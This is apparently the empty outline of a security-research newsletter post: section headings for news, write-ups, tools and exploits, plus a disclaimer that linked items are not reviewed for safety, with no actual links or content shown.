News

Techniques and Write-ups

Tools and Exploits

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

❌